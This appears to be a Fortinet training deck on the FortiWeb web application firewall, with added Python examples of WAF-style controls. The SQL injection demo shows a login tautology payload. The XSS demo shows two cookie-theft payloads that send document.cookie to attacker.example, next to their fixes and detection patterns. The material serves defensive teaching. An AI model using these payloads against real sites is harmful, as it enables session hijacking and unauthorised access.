Fortinet Confidential
Xtreme Team:
Introduction to FortiWeb
and application layer attacks
AGENDA
FortiWeb Overview
Deployment Modes
Product Family
FortiWeb Labs
[Diagram: the Internet connects through to Web Applications, which are backed by Database Servers.]
[Diagram: tiers of a web application. Browser, over HTTP / Network / Wireless, reaches the Presentation Layer (Web Servers, Web Services, Media Store); the Application Server holds the Business Logic, Customer Identification, Content Services and Access Controls; the Database Server holds Transaction Information and Core Business Data.]
Security Professionals Don't Know The Applications
"As a Network Security Professional, I don't know how my company's web applications are supposed to work, so I deploy a protective solution, but I don't know if it's protecting what it's supposed to."
Application Developers Don't Know Security
[Diagram: a Browser on the Internet speaks HTTP(S) to the DMZ, where the front firewall allows HTTP port 80 and HTTPS port 443 to the web servers (IIS, SunOne, Apache). A second firewall only allows applications on the web server to talk to the application server (ASP, .NET, WebSphere, Java) on the Trusted Inside. A third firewall only allows the application server to talk to the database server (SQL, Oracle, DB2) on the Corporate Inside.]
Always Remember
Injections
[Diagram: a user submits User and Pass in a login Form; the request passes the Firewall to the Web Server, which queries the DB Server.]
[Diagram: the same flow, numbered 1 to 6, with the Pass field carrying `or 1=1--` so the database query is altered.]
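The login flow from the diagram, worked as an added example (my own code, not Fortinet's or the slide's): a SQLite users table built from constructed sample accounts, the string-built query that the `or 1=1--` payload defeats, the parameterised query that it cannot touch, and a coarse WAF-style signature for the same payload. One detail the slide abbreviates: the payload needs a leading quote (`' or 1=1--`) to close the password literal before the `or` is read as SQL.

```python
import re
import sqlite3

# Constructed sample accounts; not from the original slides.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Build an in-memory SQLite users table from the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, user, password):
    """The flawed pattern: form fields are concatenated into the SQL text, so a
    quote in the password field terminates the literal and the rest of the
    field ("or 1=1--") is parsed as SQL. The trailing -- comments out the
    closing quote the application appends."""
    sql = (f"SELECT username FROM users WHERE username = '{user}' "
           f"AND password = '{password}'")
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, user, password):
    """The fix: bound parameters. The driver sends the values separately from
    the statement text, so they are never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (user, password)))


# Coarse WAF-style signature for the tautology shown on the slide. A real
# signature set is far larger and tuned to avoid false positives.
SQLI_SIGNATURE = re.compile(
    r"(?i)('\s*or\s+\S+\s*=\s*\S+|--\s*$|;\s*drop\b|\bunion\s+select\b)")


def waf_flags_parameter(value):
    """Return True if a form parameter matches the SQL injection signature."""
    return SQLI_SIGNATURE.search(value) is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print(login_vulnerable(db, "nobody", payload))  # every account matches
    print(login_safe(db, "nobody", payload))        # nothing matches
    print(waf_flags_parameter(payload))
```

The signature shows what a WAF in front of an unfixed application can do; the parameterised query shows what removes the flaw. Both belong in a deployment, since the WAF signature is a backstop rather than a fix.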
Steal cookies
Hijack the user's session
Alter the content of a web page
Spy on what the user does
Map the internal network
And much more
XSS Explained
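Added example (not from the slides) of why the impacts listed above are reachable: a search page that reflects the query without encoding, the same page with HTML encoding, and a constructed cookie-theft payload in both element and attribute context, with the check a WAF or test harness would run on the rendered output. The templates, the payloads and the `attacker.example` host are assumptions made for the example.

```python
import html
import re

# Constructed templates; not from the original slides.
SEARCH_TEMPLATE = "<p>Results for: {term}</p>"
INPUT_TEMPLATE = '<input type="text" name="q" value="{term}">'


def render_vulnerable(term):
    """Reflects the search term into the page with no encoding."""
    return SEARCH_TEMPLATE.format(term=term)


def render_escaped(term):
    """Encodes <, >, &, " and ' so the browser treats the term as text."""
    return SEARCH_TEMPLATE.format(term=html.escape(term, quote=True))


def render_attribute_vulnerable(term):
    """Attribute context with no encoding: a closing quote in the term lets
    the attacker append event-handler attributes to the element."""
    return INPUT_TEMPLATE.format(term=term)


def render_attribute_escaped(term):
    """quote=True also encodes the quote characters, which closes that gap."""
    return INPUT_TEMPLATE.format(term=html.escape(term, quote=True))


# What a WAF or a test harness can look for in the rendered output.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
EVENT_HANDLER = re.compile(r'"\s+on\w+\s*=', re.IGNORECASE)


def executes_script(page):
    """True if the page contains a script element or an injected handler."""
    return bool(SCRIPT_TAG.search(page) or EVENT_HANDLER.search(page))


# Constructed payloads of the kind behind "Steal cookies" above.
COOKIE_THEFT = ("<script>new Image().src='http://attacker.example/?c='"
                "+document.cookie</script>")
ATTR_BREAKOUT = ('" onfocus="fetch(\'http://attacker.example/?c=\''
                 '+document.cookie)" autofocus="')

if __name__ == "__main__":
    print(render_vulnerable(COOKIE_THEFT))
    print(render_escaped(COOKIE_THEFT))
    print(render_attribute_vulnerable(ATTR_BREAKOUT))
    print(render_attribute_escaped(ATTR_BREAKOUT))
```

The attribute case is the one most often missed: encoding only `<` and `>` leaves the `"` breakout open, which is why the escape call passes `quote=True`.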
Information Leakage
Misconfigurations
Conclusions
Network Firewall, IPS/Deep Packet Inspection Firewalls and the FortiWeb Web Application Firewall, placed along the stack from the network layer (OSI 1-3) up to the application layer (OSI 4-7).
OWASP Top 10 (2013)
A1 - Injection
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
A2 - Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.
A3 - Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained, as many are not shipped with secure defaults. This includes keeping all software up to date.
A6 - Sensitive Data Exposure
Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
A7 - Missing Function Level Access Control
Virtually all web applications verify function-level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.
A8 - Cross-Site Request Forgery (CSRF)
A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests that the vulnerable application thinks are legitimate requests from the victim.
A9 - Using Components with Known Vulnerabilities
Vulnerable components, such as libraries, frameworks, and other software modules, almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.
A10 - Unvalidated Redirects and Forwards
Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
PCI DSS
Requirement 6: Develop and maintain secure systems and applications
Patching
Configuration
Development lifecycle
Testing
Production
FortiWeb Overview
Cross-site scripting
SQL injection
Information Leakage
HTTP Response Splitting
WAF: secures Web applications
Application Delivery: assures availability and accelerates performance of critical web applications (optimizes application delivery)
Protocol Validation
Validates HTTP RFC compliance
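Added example (my code, not FortiWeb's) of the kind of check that RFC-compliance validation performs, and of the HTTP Response Splitting item in the overview list above: a request-header validator that enforces request-line shape, token characters in methods and header names, no bare CR or LF, the Host requirement for HTTP/1.1 and the Content-Length / Transfer-Encoding conflict, plus a guard for header values built from user input. The sample requests are constructed.

```python
import re
from urllib.parse import unquote

# RFC 7230 token characters, valid for methods and header field names.
TOKEN = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")
VERSION = re.compile(r"^HTTP/1\.[01]$")


def validate_request(raw):
    """Return the list of RFC violations found in a raw request; an empty
    list means the request passed. Only the header section is examined."""
    problems = []
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return ["non-ASCII bytes in request header section"]
    head, sep, _body = text.partition("\r\n\r\n")
    if not sep:
        problems.append("header section not terminated by an empty line")
    lines = head.split("\r\n")
    if any("\r" in line or "\n" in line for line in lines):
        problems.append("bare CR or LF inside the header section")
    parts = lines[0].split(" ")          # exactly one SP between the three parts
    if len(parts) != 3:
        problems.append("malformed request line")
        return problems
    method, _target, version = parts
    if not TOKEN.match(method):
        problems.append(f"invalid method token {method!r}")
    if not VERSION.match(version):
        problems.append(f"unsupported version {version!r}")
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not TOKEN.match(name):   # also catches "Host : x"
            problems.append(f"malformed header line {line!r}")
            continue
        headers.append((name.lower(), value.strip()))
    names = {n for n, _ in headers}
    if version == "HTTP/1.1" and "host" not in names:
        problems.append("HTTP/1.1 request without a Host header")
    lengths = [v for n, v in headers if n == "content-length"]
    if any(not v.isdigit() for v in lengths):
        problems.append("non-numeric Content-Length")
    if len(set(lengths)) > 1:
        problems.append("conflicting Content-Length values")
    if lengths and "transfer-encoding" in names:
        # Front end and back end may disagree on where the body ends.
        problems.append("Content-Length and Transfer-Encoding both present")
    return problems


def safe_header_value(value):
    """Reject a header value (for example a Location built from user input)
    that would split the response. %0d/%0a are decoded first so an encoded
    CR/LF cannot slip past to a server that decodes it later."""
    for candidate in (value, unquote(value)):
        if "\r" in candidate or "\n" in candidate:
            raise ValueError("CR or LF in header value (HTTP response splitting)")
    return value


if __name__ == "__main__":
    print(validate_request(b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"))
    print(validate_request(b"GET /index.html\r\nHost: a\r\n\r\n"))
```

Each violation returns a reason string rather than a bare boolean so the attack log can carry it, matching the "full HTTP request" detail the alerting section calls for.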
FortiWeb Customers
Government
Telco
Retail/Technology/Financial/Other
Parameter Tampering
Hidden field rules prevent tampering by caching the values of a session's hidden inputs as they pass from the server to the client, and verifying that they remain unchanged when the client submits the form to its POST URL.
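A simplified implementation of the hidden field rule as described above, added here as an example (my code, not FortiWeb's): hidden inputs are cached per session and POST URL as the response passes to the client, and the submitted form body is compared against that cache. The checkout form and the session identifiers are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs


class HiddenInputCollector(HTMLParser):
    """Collects the hidden inputs of every form in a server response,
    keyed by the form's POST URL (its action attribute)."""

    def __init__(self):
        super().__init__()
        self.forms = {}        # action -> {input name: value}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = a.get("action", "")
            self.forms.setdefault(self._current, {})
        elif (tag == "input" and self._current is not None
              and a.get("type", "").lower() == "hidden"):
            self.forms[self._current][a.get("name", "")] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


class HiddenFieldRule:
    """Caches hidden input values per (session, POST URL) on the way out and
    verifies them when the client posts the form back."""

    def __init__(self):
        self.cache = {}

    def observe_response(self, session_id, body):
        parser = HiddenInputCollector()
        parser.feed(body)
        for action, hidden in parser.forms.items():
            self.cache[(session_id, action)] = hidden

    def check_request(self, session_id, post_url, body):
        expected = self.cache.get((session_id, post_url))
        if expected is None:
            return ("block", "no form was served to this session for this URL")
        submitted = {k: v[0] for k, v in
                     parse_qs(body, keep_blank_values=True).items()}
        for name, value in expected.items():
            if submitted.get(name) != value:
                return ("block", f"hidden field {name!r} was modified")
        return ("allow", "")


# Constructed checkout form, as the origin server would send it.
FORM_HTML = (
    '<form action="/checkout" method="post">'
    '<input type="hidden" name="item_id" value="1001">'
    '<input type="hidden" name="price" value="49.99">'
    '<input type="text" name="qty">'
    '<input type="submit" value="Buy">'
    '</form>'
)

if __name__ == "__main__":
    rule = HiddenFieldRule()
    rule.observe_response("sess-1", FORM_HTML)
    print(rule.check_request("sess-1", "/checkout", "item_id=1001&price=49.99&qty=2"))
    print(rule.check_request("sess-1", "/checkout", "item_id=1001&price=0.01&qty=2"))
```

A missing hidden field is treated the same as a changed one, and a form posted from a session that was never served it is blocked, which is what stops a replayed or hand-built request as well as an edited one.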
Access Control
Control clients' access to Web applications and limit the rate of requests
Restrict access to specific URLs
Enforce a page order that follows the application logic
Specify the URLs allowed to initiate sessions
Specify allowed HTTP methods
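Added example (not FortiWeb's code) of the four controls listed above combined into one per-session policy: allowed methods, a URL allow-list, start pages that may initiate a session, and a page order rule. The shop paths and the policy values are assumptions.

```python
import re


class AccessControlPolicy:
    """Per-session enforcement of allowed methods, a URL allow-list, start
    pages (URLs allowed to initiate a session) and a page order rule."""

    def __init__(self, allowed_methods, allowed_urls, start_pages, page_order):
        self.allowed_methods = set(allowed_methods)
        self.allowed_urls = [re.compile(p) for p in allowed_urls]
        self.start_pages = set(start_pages)
        self.page_order = list(page_order)
        self.sessions = {}    # session id -> number of ordered pages completed

    def evaluate(self, session_id, method, path):
        """Return (allowed, reason) for one request."""
        if method not in self.allowed_methods:
            return (False, f"method {method} not allowed")
        if not any(p.fullmatch(path) for p in self.allowed_urls):
            return (False, f"URL {path} not in allow-list")
        if session_id not in self.sessions:
            if path not in self.start_pages:
                return (False, f"{path} may not initiate a session")
            self.sessions[session_id] = 0
        if path in self.page_order:
            step = self.page_order.index(path)
            done = self.sessions[session_id]
            if step > done:
                return (False, f"{path} requested before {self.page_order[done]}")
            if step == done:
                self.sessions[session_id] = done + 1
        return (True, "")


def shop_policy():
    """Constructed policy for a small shop: pay only after cart and checkout."""
    return AccessControlPolicy(
        allowed_methods={"GET", "POST"},
        allowed_urls=[r"/", r"/login", r"/catalog(/.*)?", r"/cart",
                      r"/checkout", r"/pay"],
        start_pages={"/", "/login"},
        page_order=["/cart", "/checkout", "/pay"],
    )


if __name__ == "__main__":
    policy = shop_policy()
    for sid, method, path in [("s1", "GET", "/"), ("s1", "GET", "/cart"),
                              ("s1", "POST", "/pay"), ("s1", "POST", "/checkout"),
                              ("s1", "POST", "/pay"), ("s2", "GET", "/pay")]:
        print(sid, method, path, policy.evaluate(sid, method, path))
```

Revisiting an earlier step in the order is allowed (the user may go back to the cart), but jumping ahead is not, which is the case that a script calling `/pay` directly would hit.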
DoS/DDoS Protection
Application layer policies: requests from different users are analyzed on characteristics such as source IP and cookie, and FortiWeb distinguishes real users from automated attack tools (HOIC, LOIC)
Network layer: number of TCP connections from the same source IP address; SYN flood attacks
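Added example (my code, not FortiWeb's) of the two layers described above: sliding-window request limits keyed by source IP and by session cookie, and a cap on concurrent TCP connections per source IP. The limits and addresses are assumed values.

```python
from collections import deque


class SlidingWindowLimiter:
    """Allows at most `limit` events per key within any `window` seconds."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self.events = {}      # key -> timestamps of recent events

    def allow(self, key, now):
        q = self.events.setdefault(key, deque())
        while q and now - q[0] >= self.window:
            q.popleft()       # drop events that fell out of the window
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


class DosPolicy:
    """Application-layer limits keyed by source IP and by session cookie,
    plus a network-layer cap on concurrent TCP connections per source IP."""

    def __init__(self, ip_limit, cookie_limit, window, max_tcp_per_ip):
        self.by_ip = SlidingWindowLimiter(ip_limit, window)
        self.by_cookie = SlidingWindowLimiter(cookie_limit, window)
        self.max_tcp = max_tcp_per_ip
        self.tcp = {}

    def connection_opened(self, ip):
        """Return False (drop the connection) once the per-IP cap is reached."""
        if self.tcp.get(ip, 0) >= self.max_tcp:
            return False
        self.tcp[ip] = self.tcp.get(ip, 0) + 1
        return True

    def connection_closed(self, ip):
        if self.tcp.get(ip, 0) > 0:
            self.tcp[ip] -= 1

    def request(self, ip, session_cookie, now):
        """Return (allowed, reason) for one HTTP request."""
        if not self.by_ip.allow(ip, now):
            return (False, "request rate from source IP exceeded")
        if session_cookie is not None and not self.by_cookie.allow(session_cookie, now):
            return (False, "request rate for session cookie exceeded")
        return (True, "")


if __name__ == "__main__":
    policy = DosPolicy(ip_limit=5, cookie_limit=3, window=10, max_tcp_per_ip=2)
    print([policy.request("198.51.100.7", None, t)[0] for t in range(6)])
    print([policy.request(f"203.0.113.{i}", "SID=abc", 20)[0] for i in range(1, 5)])
```

Keying by cookie as well as IP matters in both directions: many users behind one NAT share an address but carry different cookies, and a botnet that replays one captured session spreads it across many addresses, which the IP limit alone would pass.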
Enhanced/Basic Mode
Authentication options
Granular crawling capabilities
Scheduled and on-demand scanning
Server Information
Crawling information
URLs accepting input
External Links
Reports can be emailed automatically
Updates via FortiGuard
Round Robin
Weighted Round Robin
Least Connection
HTTP Session Based Round Robin
Connection persistence
Persistence timeout value
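Added example of the selection methods listed above (my code; the slides do not show FortiWeb's implementation): plain round robin, smooth weighted round robin, least connection, and a persistence table with a timeout that applies to whichever method is chosen. Server names and weights are assumptions.

```python
class ServerPool:
    """Back-end selection: round robin, weighted round robin, least
    connection, and connection persistence with a timeout."""

    def __init__(self, weights, persistence_timeout):
        self.servers = list(weights)                  # keeps insertion order
        self.weights = dict(weights)
        self.active = {s: 0 for s in self.servers}    # open connections
        self._current = {s: 0 for s in self.servers}  # smooth WRR scores
        self._rr_index = 0
        self.timeout = persistence_timeout
        self.persist = {}                             # client -> (server, last seen)

    def round_robin(self):
        server = self.servers[self._rr_index % len(self.servers)]
        self._rr_index += 1
        return server

    def weighted_round_robin(self):
        """Smooth weighted round robin: each pick adds every server's weight
        to its score, takes the highest score, and subtracts the total, so
        a 3:1 weighting yields A, A, B, A rather than A, A, A, B."""
        total = sum(self.weights.values())
        for s in self.servers:
            self._current[s] += self.weights[s]
        chosen = max(self.servers, key=lambda s: self._current[s])
        self._current[chosen] -= total
        return chosen

    def least_connection(self):
        return min(self.servers, key=lambda s: self.active[s])

    def pick(self, client_key, now, method="round_robin"):
        """Honour an unexpired persistence entry; otherwise select with the
        named method and remember the result for this client."""
        entry = self.persist.get(client_key)
        if entry and now - entry[1] < self.timeout:
            self.persist[client_key] = (entry[0], now)
            return entry[0]
        server = getattr(self, method)()
        self.persist[client_key] = (server, now)
        return server


if __name__ == "__main__":
    pool = ServerPool({"A": 3, "B": 1}, persistence_timeout=30)
    print([pool.weighted_round_robin() for _ in range(8)])
    trio = ServerPool({"A": 1, "B": 1, "C": 1}, persistence_timeout=30)
    print(trio.pick("client-1", 0), trio.pick("client-1", 10), trio.pick("client-1", 50))
```

The persistence entry is refreshed on every hit, so the timeout is an idle timeout: a client that keeps sending within the window stays on its server indefinitely, which is the behaviour session-bound applications need.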
Authentication Offloading
Offload web server authentication to FortiWeb
Support for different authentication schemes:
Locally-defined accounts
LDAP
RADIUS
NTLM
Event/Attack/Traffic Alerts
Attack Alerts: the full HTTP request
Traffic Alerts: any access to web applications
Event Alerts: any action on the FortiWeb device
Reports - Attacks
Out-of-the-box rich graphical reports
Custom reports
Scheduled daily, weekly, monthly or on demand
PDF, HTML, Word, TXT, MHT formats
Report on any access or change to the FortiWeb device
Deployment Modes
[Diagram: Reverse Proxy deployment, with FortiWeb placed in front of the Web Application Servers.]
Features by Mode
Operation modes compared: Reverse Proxy, True Transparent Proxy, Transparent Inspection, Offline Protection
Features compared (the per-mode support marks of the original table are not reproduced here):
HTTP
HTTPS
Bridges / V-zones
Client Certificate Verification
Config. Sync (Non-HA)
Cookie Poisoning Prevention
DoS Protection
Error Page Customization
Fail-to-wire
File Compression
Hidden Input Constraints
HA
Information Disclosure Prevention
Page Order Rules
Rewriting / Redirection
Session Management
SSL/TLS Offloading
SSLv3 Support
SSLv2 Support
Start Page Enforcement
User Authentication
X-Forwarded-For: Support
XML Protection
Transparent Mode
No changes to the IP address scheme of the network are required
Fewer features than reverse proxy mode
Web servers see the source IP address of clients
The appliance forwards non-HTTP/HTTPS protocols
True transparent proxy
FortiWeb transparently proxies the traffic arriving on a port that belongs to a L2 bridge, applies the first applicable policy, and lets permitted traffic pass through. FortiWeb logs, blocks, or modifies violations. This mode supports user authentication via HTTP but not HTTPS.
Transparent inspection
FortiWeb asynchronously inspects traffic arriving on a port that belongs to a L2 bridge, applies the first applicable policy, and lets permitted traffic pass through (because inspection is asynchronous, it adds minimal latency). FortiWeb logs or blocks traffic but does not otherwise modify it, so this mode cannot offload SSL, load-balance connections, or support user authentication.
Product Family
FortiWeb 400c
Throughput: 100 Mbps
SSL Throughput: 70 Mbps
Connections per second: (value not given on the slide)
Form Factor: 1U
Storage Capacity: 1 TB
Interfaces: 4 x 10/100/1000
FortiWeb 1000c
Throughput: 500 Mbps
SSL Throughput: 400 Mbps
Connections per second: (value not given on the slide)
Form Factor: 1U
Storage Capacity: 1 TB
Interfaces: 4 x 10/100/1000 (2x bypass)
FortiWeb 3000c
Throughput: 1 Gbps
SSL Throughput: 630 Mbps
Connections per second: (value not given on the slide)
Form Factor: 2U
Storage Capacity: 2 TB
Interfaces: 6 x 10/100/1000 (2x bypass)
FortiWeb 4000c
Throughput: 2 Gbps
SSL Throughput: 1 Gbps
Connections per second: (value not given on the slide)
Form Factor: 2U
Storage Capacity: 2 TB
Interfaces: (value not given on the slide)
FortiWeb VM Series
FWB-VM02: Throughput 100 Mbps, Max HTTP transactions/sec 8,000
FWB-VM04: Throughput 500 Mbps, Max HTTP transactions/sec 24,000
FWB-VM08: Throughput 1 Gbps, Max HTTP transactions/sec 36,000
Max vCPU Supported: (per-model values not given on the slide)
Further values listed on the slide without a label: 1 GB, 40 GB